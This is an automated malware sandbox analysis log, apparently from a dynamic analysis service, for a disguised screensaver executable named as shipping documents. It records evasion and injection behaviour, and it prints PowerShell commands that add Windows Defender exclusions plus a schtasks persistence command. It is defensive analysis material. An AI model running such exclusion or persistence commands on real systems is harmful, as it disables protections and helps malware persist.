Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	8_2_01ABEB1D
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	8_2_01ABEB1D
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	8_2_01ABEB1D
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	8_2_01ABEB1D
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABEB1D mov eax, dword ptr fs:[00000030h]	8_2_01ABEB1D
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3CB7E mov eax, dword ptr fs:[00000030h]	8_2_01A3CB7E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF4B4B mov eax, dword ptr fs:[00000030h]	8_2_01AF4B4B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF4B4B mov eax, dword ptr fs:[00000030h]	8_2_01AF4B4B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE8B42 mov eax, dword ptr fs:[00000030h]	8_2_01AE8B42
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD6B40 mov eax, dword ptr fs:[00000030h]	8_2_01AD6B40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD6B40 mov eax, dword ptr fs:[00000030h]	8_2_01AD6B40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0AB40 mov eax, dword ptr fs:[00000030h]	8_2_01B0AB40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEEB50 mov eax, dword ptr fs:[00000030h]	8_2_01AEEB50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A48AA0 mov eax, dword ptr fs:[00000030h]	8_2_01A48AA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A48AA0 mov eax, dword ptr fs:[00000030h]	8_2_01A48AA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A96AA4 mov eax, dword ptr fs:[00000030h]	8_2_01A96AA4
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80 mov eax, dword ptr fs:[00000030h]	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14A80 mov eax, dword ptr fs:[00000030h]	8_2_01B14A80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A78A90 mov edx, dword ptr fs:[00000030h]	8_2_01A78A90
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7AAEE mov eax, dword ptr fs:[00000030h]	8_2_01A7AAEE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7AAEE mov eax, dword ptr fs:[00000030h]	8_2_01A7AAEE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A96ACC mov eax, dword ptr fs:[00000030h]	8_2_01A96ACC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A96ACC mov eax, dword ptr fs:[00000030h]	8_2_01A96ACC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A96ACC mov eax, dword ptr fs:[00000030h]	8_2_01A96ACC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A40AD0 mov eax, dword ptr fs:[00000030h]	8_2_01A40AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A74AD0 mov eax, dword ptr fs:[00000030h]	8_2_01A74AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A74AD0 mov eax, dword ptr fs:[00000030h]	8_2_01A74AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA24 mov eax, dword ptr fs:[00000030h]	8_2_01A7CA24
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6EA2E mov eax, dword ptr fs:[00000030h]	8_2_01A6EA2E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A64A35 mov eax, dword ptr fs:[00000030h]	8_2_01A64A35
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A64A35 mov eax, dword ptr fs:[00000030h]	8_2_01A64A35
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA38 mov eax, dword ptr fs:[00000030h]	8_2_01A7CA38
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ACCA11 mov eax, dword ptr fs:[00000030h]	8_2_01ACCA11
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	8_2_01A7CA6F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	8_2_01A7CA6F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CA6F mov eax, dword ptr fs:[00000030h]	8_2_01A7CA6F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEEA60 mov eax, dword ptr fs:[00000030h]	8_2_01AEEA60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABCA72 mov eax, dword ptr fs:[00000030h]	8_2_01ABCA72
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABCA72 mov eax, dword ptr fs:[00000030h]	8_2_01ABCA72
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46A50 mov eax, dword ptr fs:[00000030h]	8_2_01A46A50
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50A5B mov eax, dword ptr fs:[00000030h]	8_2_01A50A5B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50A5B mov eax, dword ptr fs:[00000030h]	8_2_01A50A5B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A76DA0 mov eax, dword ptr fs:[00000030h]	8_2_01A76DA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CDB1 mov ecx, dword ptr fs:[00000030h]	8_2_01A7CDB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CDB1 mov eax, dword ptr fs:[00000030h]	8_2_01A7CDB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7CDB1 mov eax, dword ptr fs:[00000030h]	8_2_01A7CDB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A68DBF mov eax, dword ptr fs:[00000030h]	8_2_01A68DBF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A68DBF mov eax, dword ptr fs:[00000030h]	8_2_01A68DBF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14DAD mov eax, dword ptr fs:[00000030h]	8_2_01B14DAD
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B08DAE mov eax, dword ptr fs:[00000030h]	8_2_01B08DAE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B08DAE mov eax, dword ptr fs:[00000030h]	8_2_01B08DAE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4ADE0 mov eax, dword ptr fs:[00000030h]	8_2_01A4ADE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4ADE0 mov eax, dword ptr fs:[00000030h]	8_2_01A4ADE0

Enables debug privileges

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateFile: Direct from: 0x77752FEC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtOpenFile: Direct from: 0x77752DCC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtSetInformationThread: Direct from: 0x777463F9
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryInformationToken: Direct from: 0x77752CAC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtTerminateThread: Direct from: 0x77752FCC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtSetInformationProcess: Direct from: 0x77752C5C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtNotifyChangeKey: Direct from: 0x77753C2C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtOpenKeyEx: Direct from: 0x77752B9C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtOpenSection: Direct from: 0x77752E0C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtTerminateThread: Direct from: 0x77747B2E
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQuerySystemInformation: Direct from: 0x777548CC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateUserProcess: Direct from: 0x7775371C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtWriteVirtualMemory: Direct from: 0x7775490C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryInformationProcess: Direct from: 0x77752C26
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtResumeThread: Direct from: 0x77752FBC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtReadVirtualMemory: Direct from: 0x77752E8C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateKey: Direct from: 0x77752C6C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtSetInformationThread: Direct from: 0x77752B4C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQueryAttributesFile: Direct from: 0x77752E6C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtCreateMutant: Direct from: 0x777535CC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtMapViewOfSection: Direct from: 0x77752D1C
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtResumeThread: Direct from: 0x777536AC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtReadFile: Direct from: 0x77752ADC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtQuerySystemInformation: Direct from: 0x77752DFC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtDelayExecution: Direct from: 0x77752DDC
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: NULL target: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe protection: read write
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\SecEdit.exe

Thread register set: target process: 1732

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\SecEdit.exe

Thread APC queued: target process: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1FA1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
Source: C:\Windows\SysWOW64\SecEdit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: xBk0IlKjg.exe, 0000000F.00000000.1666924647.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849847947.00000000012D0000.00000002.00000001.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812117549.00000000013D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Users\user\Desktop\Original Shipping Documents.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
